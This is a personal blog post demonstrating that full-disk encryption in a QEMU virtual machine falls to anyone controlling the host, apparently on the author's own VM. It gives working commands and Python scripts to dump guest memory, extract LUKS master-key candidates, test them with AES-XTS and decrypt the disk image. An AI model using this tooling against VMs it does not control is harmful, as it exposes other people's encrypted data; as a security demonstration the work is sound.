Max Duijsens
About computer security and other hobbies

Breaking VM Full-Disk Encryption

I used to rent multiple VPSs on which I hosted various services, for example this blog. When I don't have access to a console session on a VPS, I tend to create only an encrypted container and keep all config files in there. On some VPSs, however, I do have console access, so it is much more convenient to use full-disk encryption. Of course, full-disk encryption in a virtual machine is completely broken if you cannot trust the hypervisor, because the key has to sit in the guest's RAM, which the host can read. At least that's what I learned in school. Curious as we are, let's see if we can break the encryption of a VM running under QEMU on my own host.

Step 1: Get the memory dump

I'm running my VM on a Linux host, so I'll use gcore, which ships with gdb, to make a memory dump. First figure out which PID your target VM is using, then run the following command:

$ gcore -o quemu.bin <pid>

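This gives you a core file containing the memory of your VM. Note that gcore treats the -o argument as a prefix and appends the PID, so the file is actually named quemu.bin.<pid>; I'll keep calling it quemu.bin below. Strictly speaking it holds all memory the QEMU process is using on the host, so it may include some additional stuff. I'm not a virtualisation professional, so let's leave that to those guys.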

Now the master key should be somewhere in quemu.bin since that file contains the RAM of the VM.
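
Before going further, it can be worth checking that the dump really is an ELF core file, since that is what the key-hunting script in Step 3 expects. Here is a minimal sketch in Python 3 (the other scripts in this post are Python 2). The helper names is_elf_core and check_dump are made up for illustration, and the check only looks at the ELF magic and the e_type field:

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_CORE = 4  # e_type value that marks a core file in the ELF format


def is_elf_core(header):
    """Return True if the leading bytes of a file look like an ELF core."""
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        return False
    # e_ident[EI_DATA] (byte 5) gives the byte order: 1 = little-endian.
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type == ET_CORE


def check_dump(path):
    """Hypothetical helper: read the start of the dump and test it."""
    with open(path, "rb") as fd:
        return is_elf_core(fd.read(64))
```

Calling check_dump on the file written by gcore should return True; anything else suggests the dump did not work.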

Step 2: Get the actual data

Just go to the folder where the disk image is located and copy the image to another folder. This image has an encrypted partition on it which we want to decrypt, but it also includes other things, such as a partition table and a LUKS header, which we need to strip off to make decrypting it easier later on.

Here is a Python script which strips off the partition table and LUKS header from a QEMU image. It assumes a raw image with the LUKS container on partition 5:

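import subprocess
import sys
import re

if len(sys.argv) < 3:
    sys.stderr.write("Usage: convert.py input.img encrypted.img\n")
    sys.exit(1)

inputFilename = sys.argv[1]
outputFilename = sys.argv[2]

# fdisk lists the partitions of the image as <image>1, <image>2, ...; the
# first number after the partition name is its start sector. Partition 5
# is assumed to hold the LUKS container.
fdisk = subprocess.check_output(["/sbin/fdisk", "-l", inputFilename])
matcher = r"^" + re.escape(inputFilename) + r'5\s+(\d+)'
match = re.search(matcher, fdisk, re.MULTILINE)
if match is None:
    sys.stderr.write("No partition 5 found in fdisk output\n")
    sys.exit(1)
luksOffset = int(match.group(1))
# Skip the LUKS header: the payload is assumed to start 4096 sectors
# into the partition (4096*512 = 2MB).
payloadOffset = luksOffset + 4096
subprocess.call(["dd", "if=" + inputFilename, "of=" + outputFilename,
                 "skip=" + str(payloadOffset),
                 "bs=512"])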

encrypted.img now contains only the encrypted payload from the input.img disk image.
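
The script above hardcodes the payload offset as 4096 sectors. As a hedged alternative, the offset can be read from the LUKS header itself. The sketch below is Python 3 and assumes the LUKS1 on-disk layout (magic, version, cipher name, cipher mode, hash spec, then payload offset and key size as big-endian 32-bit integers at byte 104). The function names are hypothetical, and LUKS2 headers are not handled:

```python
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"


def parse_luks1_header(header):
    """Extract a few fields from the first 112 bytes of a LUKS1 header."""
    if len(header) < 112 or header[:6] != LUKS_MAGIC:
        raise ValueError("not a LUKS header")
    # All multi-byte integers in a LUKS1 header are big-endian.
    (version,) = struct.unpack_from(">H", header, 6)
    if version != 1:
        raise ValueError("only LUKS1 is handled in this sketch")
    cipher_name = header[8:40].rstrip(b"\0").decode("ascii")
    cipher_mode = header[40:72].rstrip(b"\0").decode("ascii")
    # payload_offset is counted in 512-byte sectors from the start of
    # the partition; key_bytes is the master key length in bytes.
    payload_offset, key_bytes = struct.unpack_from(">II", header, 104)
    return {
        "cipher_name": cipher_name,
        "cipher_mode": cipher_mode,
        "payload_offset": payload_offset,
        "key_bytes": key_bytes,
    }


def read_luks1_header(image_path, partition_start_sector):
    """Hypothetical helper: parse the header of a partition in a raw image."""
    with open(image_path, "rb") as fd:
        fd.seek(partition_start_sector * 512)
        return parse_luks1_header(fd.read(112))
```

The key_bytes field is also handy for Step 3: it tells you how long the master key is, instead of assuming 64 bytes.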

Step 3: Get the keys

One option to get the key is to simply try every 64-byte block from the QEMU core dump as a key for encrypted.img. However, that means a lot of AES operations, which take a long time. There are a few ways to make it faster:

  1. The encryption key is probably aligned to a 4-byte boundary in RAM.
  2. The key is unlikely to contain more than a few repeating bytes, or many consecutive null bytes (0x00).
  3. You only need to decrypt the first 16 bytes of the image. In this setup those 16 bytes are zeroes when decrypted, so a key is likely to be correct if the first 16 bytes of its output are all zeroes.
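
The first two heuristics can be sketched as a small filter. This is Python 3 rather than the Python 2 used elsewhere in this post, the names looks_like_key and key_candidates are made up, and the threshold of 32 distinct byte values is an arbitrary assumption of mine, not something taken from the scripts below:

```python
def looks_like_key(candidate, min_distinct=32):
    """Cheap plausibility test for a block of possible key material."""
    # Heuristic 2: random key bytes rarely contain a run of null bytes...
    if b"\0\0\0\0" in candidate:
        return False
    # ...and rarely repeat the same few byte values over and over.
    # min_distinct is an assumed threshold, chosen for illustration.
    if len(set(candidate)) < min_distinct:
        return False
    return True


def key_candidates(memory, key_size=64, step=4):
    """Yield (offset, block) for every plausible block in a memory buffer."""
    # Heuristic 1: only look at offsets on a 4-byte boundary.
    for start in range(0, len(memory) - key_size + 1, step):
        candidate = memory[start:start + key_size]
        if looks_like_key(candidate):
            yield start, candidate
```

The distinct-bytes test is stricter than the check in the dump script below, which only rejects blocks made of a single repeated byte, so it throws away more junk at the cost of one more assumption.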

Here is a script that dumps all key candidates. You need pyelftools installed (apt-get install python-pyelftools).

import sys
from elftools.elf.elffile import ELFFile
import binascii

# All we do here is grab each LOAD segment of the core file, then starting
# at a zero offset, we keep upping the offset by 4 bytes at a time and dumping
# out a candidate key.
def dump_block(segment):
    data = segment.data()
    keySize = 64
    for start in xrange(0, len(data) - keySize + 1, 4):
        key = data[start:start + keySize]
        # Skip blocks made of a single repeated byte or containing a run
        # of four null bytes; neither is likely to be key material.
        all_same = key[0:-1] == key[1:]
        if all_same or ('\0\0\0\0' in key):
            continue
        print binascii.hexlify(key)

coreFilename = sys.argv[1]

with open(coreFilename, "rb") as fd:
    elffile = ELFFile(fd)
    for segment in elffile.iter_segments():
        header = segment.header
        # Only PT_LOAD segments with file contents hold memory; PT_NOTE
        # and everything else is ignored.
        if header.p_type == 'PT_LOAD' and header.p_filesz > 0:
            dump_block(segment)

This script prints all key candidates to stdout, so you can redirect its output to a file. It performs no AES operations itself; it only filters the memory dump and writes out what is left, so it should not take more than a few minutes. The AES work happens in the next script.
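
To get a feel for how much output to expect, here is a small back-of-the-envelope calculation in Python 3. It gives an upper bound before any filtering, under the same assumptions as the dump script (64-byte keys, 4-byte steps, one hex-encoded candidate per line). The function name candidate_stats is made up for illustration:

```python
def candidate_stats(dump_bytes, key_size=64, step=4):
    """Return (number of candidates, bytes of hex output) for one segment.

    This is an upper bound: it ignores the filtering of repeated and
    null-heavy blocks, which removes many candidates in practice.
    """
    if dump_bytes < key_size:
        return 0, 0
    count = (dump_bytes - key_size) // step + 1
    # Each candidate is printed as 2 hex characters per byte plus a newline.
    line_bytes = 2 * key_size + 1
    return count, count * line_bytes
```

Every 4 bytes of memory can turn into 129 bytes of text, so the unfiltered output is roughly 32 times the size of the dump. Make sure you have the disk space, or pipe the candidates straight into the next script.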

Now we need to find the correct key among the key candidates. Here is a script that goes through all key candidates read from stdin and exits when one of them decrypts the first 16 bytes to zeroes. Be advised that it requires CryptoPlus, which you cannot install via pip, so you have to install it manually. CryptoPlus depends on pycrypto, and I would advise installing the latest version of that from source as well, since Debian's package manager contains old versions.

import sys
from CryptoPlus.Cipher import python_AES

class Locksmith(object):

    sentinel = '\0'*16

    def __init__(self, inputFilename):
        # read the first 16 bytes of encrypted data.  That's one AES
        # block.
        with open(inputFilename, "rb") as fd:
            self.ciphertext = fd.read(16)

    def tryDecode(self,trialKeyHex):
        trialKey = trialKeyHex.decode("hex")
        # Hardcode the key length; assume we're only going to get
        # 512-bit master keys because that's the Debian default.
        key1 = trialKey[0:32]
        key2 = trialKey[32:]
        # Thank you, CryptoPlus!
        decipher = python_AES.new((key1,key2), python_AES.MODE_XTS)
        maybePlaintext = decipher.decrypt(self.ciphertext)
        return self._foundSentinel(maybePlaintext)

    def _foundSentinel(self, maybePlaintext):
        return maybePlaintext == self.sentinel


inputFilename = sys.argv[1]

ls = Locksmith(inputFilename)
for line in sys.stdin:
    maybeKey = line.strip()
    # 128 hex characters = 64 bytes = one 512-bit candidate key
    if len(maybeKey) == 128 and ls.tryDecode(maybeKey):
        print maybeKey
        sys.exit(0)
sys.exit(1)

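It prints the first key that passes the test to stdout and exits with status 0. If no candidate matches, it prints nothing and exits with status 1.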

Step 4: Decrypt the image

Now that we have the key and the data, we can decrypt the disk image. This will take a while but is a straightforward AES operation. The script reads the key, as hex, from stdin:

import sys
import struct
from CryptoPlus.Cipher import python_AES

inputFilename = sys.argv[1]
outputFilename = sys.argv[2]

# The 512-bit master key is read as hex from stdin and split into the
# two 256-bit XTS keys.
key = sys.stdin.readline().strip().decode("hex")
key1 = key[0:32]
key2 = key[32:]
decipher = python_AES.new((key1, key2), python_AES.MODE_XTS)
with open(inputFilename, "rb") as inputFile:
    with open(outputFilename, "wb") as outputFile:
        sectorNum = 0
        while True:
            cipherText = inputFile.read(512)
            if not cipherText:
                break
            # Each 512-byte sector is decrypted on its own, with the
            # sector number (little-endian 64-bit) as the XTS tweak.
            plainText = decipher.decrypt(cipherText, struct.pack("<Q", sectorNum))
            outputFile.write(plainText)
            sectorNum = sectorNum + 1

This script takes a while since it is very computationally expensive. On my MacBook it took about 5 hours to decrypt a 5GB disk image. The output is an LVM PV (physical volume) image, not an actual filesystem image, so your OS won't understand how to use it directly. It's possible to strip off the LVM PV header (which is 1MB in size by default) like so:

$ dd if=decrypted.img of=ext4.img bs=1M skip=1

Now you can mount ext4.img to get access to the VM's virtual disk contents.
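
If the mount fails, a quick sanity check is to look for the ext filesystem magic number. The Python 3 sketch below relies on the ext2/3/4 superblock starting at byte 1024 of the filesystem, with the 16-bit little-endian magic 0xEF53 stored 56 bytes into it. The function names are made up for illustration, and a match only says "this looks like ext2, ext3 or ext4", not that the filesystem is intact:

```python
import struct

# The superblock starts at byte 1024; its s_magic field is 56 bytes in.
EXT_MAGIC_OFFSET = 1024 + 56
EXT_MAGIC = 0xEF53


def has_ext_magic(first_bytes):
    """Return True if a buffer holding the start of an image has the magic."""
    if len(first_bytes) < EXT_MAGIC_OFFSET + 2:
        return False
    (magic,) = struct.unpack_from("<H", first_bytes, EXT_MAGIC_OFFSET)
    return magic == EXT_MAGIC


def image_has_ext_magic(image_path):
    """Hypothetical helper: run the check on the start of an image file."""
    with open(image_path, "rb") as fd:
        return has_ext_magic(fd.read(EXT_MAGIC_OFFSET + 2))
```

If image_has_ext_magic("ext4.img") returns False, either the key was wrong or the filesystem does not start 1MB into the decrypted image, so the skip value in the dd command needs adjusting.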

Conclusion: full-disk encryption on a VM is useless if you cannot trust the host. A much better option is to control the host yourself and do full-disk encryption on the host. This makes it much harder for forensics experts to decrypt the contents of the disk.